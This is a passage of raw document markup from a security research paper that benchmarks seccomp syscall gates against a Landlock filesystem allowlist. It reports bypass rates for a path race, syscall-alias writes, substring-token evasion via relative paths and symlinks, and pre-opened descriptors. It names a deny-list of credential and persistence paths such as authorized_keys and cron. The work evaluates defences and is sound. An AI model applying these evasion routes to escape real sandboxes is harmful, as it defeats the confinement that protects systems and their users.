      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">argument, unlike the rootless filter, which denies the watched calls unconditionally. Its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">discrimination mechanism, however, is a substring match against a token list, and that mechanism sits</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on a false-positive/evasion trade-off it cannot leave.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On a seventeen-path corpus the confusion matrix was seven true positives, zero false negatives, six</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">true negatives, and four false positives (positive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>=</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">should-be-denied). Every false positive was a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">legitimate filename that merely contains a token as a substring—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">microcron_metrics.txt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cron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authorized_keys_report.csv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. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tokens that cause these false positives are the un-anchored ones; the tokens that avoid them are anchored</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">with a leading slash (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/.ssh/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/.profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), and those are exactly the tokens defeated by a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">relative path or a symbolic link through an allowed directory. Tightening a token to cut a false positive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is the same edit that opens an evasion, and loosening it to catch an evasion is the same edit that creates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a false positive. Substring matching cannot be both precise and evasion-resistant; a race-free, path-aware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mechanism such as Landlock resolves the path before deciding and is the correct comparison point for a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">production design.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="sec:holds"/>
      <w:r>
        <w:t xml:space="preserve">What holds</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The findings above are not an argument to abandon the syscall boundary. Two properties of the boundary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">survive, and stating them keeps the recommendation calibrated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Interception is invariant to the language that emitted the call. The same second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—a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">shell spawned after launch—is denied identically whether the target is compiled C, a Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">interpreter, or a shell script (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">denied_execve</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>=</m:t>
        </m:r>
        <m:r>
          <m:t>1</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in each, with the shell never running). The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gate observes the kernel interface, so the source language above it does not change the verdict.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The boundary is also the right place to observe, because analysis above it cannot certify. In companion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">work on the same corpus, ten static and dynamic detectors, AddressSanitizer included, all miss an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">intra-object overflow that crosses no kernel boundary; the artifact is clean to every checker yet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">corrupt at runtime. Observation therefore has to move to execution, and the syscall boundary is where</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">execution becomes visible. What the boundary gives is a deterministic, auditable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">verdict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; what it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">does not give, per Sections </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:toctou">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">–</w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:selectivity">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, is soundness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="a-race-free-successor-benchmarked"/>
      <w:r>
        <w:t xml:space="preserve">A race-free successor, benchmarked</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="sec:landlock"/>
      <w:r>
        <w:t xml:space="preserve">From bypass to fix: a race-free filesystem allowlist</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The two filesystem failures of Part I—the allow-path race (Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:toctou">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) and the substring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">match (Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:selectivity">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)—share a cause. The supervisor decides in user space, on a value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the kernel re-reads or on a token it never resolves to a real path. A control that decides in the kernel,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on the resolved file object, removes both. We implemented one and ran the exact Part I attacks against it.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">landlock_gate.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">installs a default-deny filesystem-write allowlist through the Landlock</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LSM </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(ABI v7 on this host);</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">landlock_bench.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reproduces the two benchmarks below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="the-race-closes."/>
      <w:r>
        <w:t xml:space="preserve">The race closes.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We reran the two-thread target of Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:toctou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for 4000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attempts under each control. The seccomp argument-inspection gate is beaten by the race on 854 of 4000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attempts (21.4%), the same scheduler-dependent bypass measured in Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:toctou">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Landlock</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is beaten on 0 of 4000. Landlock evaluates the write against the resolved file at the LSM hook, so a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sibling thread that flips the shared path buffer changes which denied path is attempted and never the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">decision; there is no user-space check for the kernel to invalidate.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evil path opened / 4000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mechanism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seccomp argument gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">854 (21.4%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">validates a string; kernel re-reads the pointer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Landlock allowlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0 (0%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">in-kernel decision on the resolved path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="the-syscall-alias-gap-closes."/>
      <w:r>
        <w:t xml:space="preserve">The syscall-alias gap closes.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The seccomp persistence gate watches</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that writes the same persistence path through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creat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is not watched, and both</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">write the file. Landlock governs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openat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">at the one file-open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hook, so all three are denied.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open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creat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openat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unprotected baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">wrote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">wrote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">wrote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seccomp persist gate (watches</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">openat</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">wrote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">wrote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied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Landlock allowlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Landlock removes the three filesystem weaknesses Part I measures in one mechanism: the TOCTOU window (no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">user-space re-read), the syscall-alias hole (one hook, not a syscall list), and the substring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">false-positive/evasion trade-off (it resolves real paths against an allowlist instead of matching tokens).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">For the filesystem-persistence policy it is the successor the Part I discussion asked for.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="where-the-allowlist-stops."/>
      <w:r>
        <w:t xml:space="preserve">Where the allowlist stops.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A control is only as useful as the boundary of what it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mediates, so we measured that boundary instead of reading it off the documentation.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">landlock_scope.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">runs three cases, each in its own child because</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">landlock_restrict_self</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is irreversible per thread, and reads the verdict from the kernel’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">errno.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execve</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">outside the allowlist,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">EXECUTE</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">handled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied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pre-open fd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</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">through an fd opened before the ruleset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">wrote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pre-open fd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</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">of that same path after the ruleset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied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p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TCP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">connect</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">under a</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CONNECT_TCP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">ruleset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied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p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">UDP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sendto</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">under the same ruleset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">allowed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p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">raw-socket</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sendto</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">under the same ruleset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three things follow, and the first corrects a claim we made in an earlier draft of this work.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Landlock</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">does</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">restrict execution:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LANDLOCK_ACCESS_FS_EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is bit 0 of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">filesystem access mask and has existed since ABI v1, and a ruleset that handles it denies an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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">outside the permitted hierarchy. What is true is narrower and is a property of our</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">configuration, not of the mechanism:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">landlock_gate.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">leaves reads and execution unhandled so</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the dynamic loader works, so in the benchmarked policy execution stays with the separate launch policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Second, a descriptor opened before</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">landlock_restrict_self</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">keeps writing through the ruleset</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">while the same path, opened fresh, is denied. Rights are bound to the open file, not re-evaluated per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">write. This bears directly on the allow-path fix of Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:toctou">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">: a supervisor that opens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a file and injects the descriptor with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SECCOMP_IOCTL_NOTIF_ADDFD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">opened it outside the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sandbox’s domain, so the descriptor it hands over does not carry the sandbox’s filesystem policy. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">delegation fix and the Landlock allowlist compose only if the supervisor applies its own check before</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">it injects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Third, the network ceiling is TCP. Under a ruleset that denies TCP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, UDP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sendto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and raw-socket</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
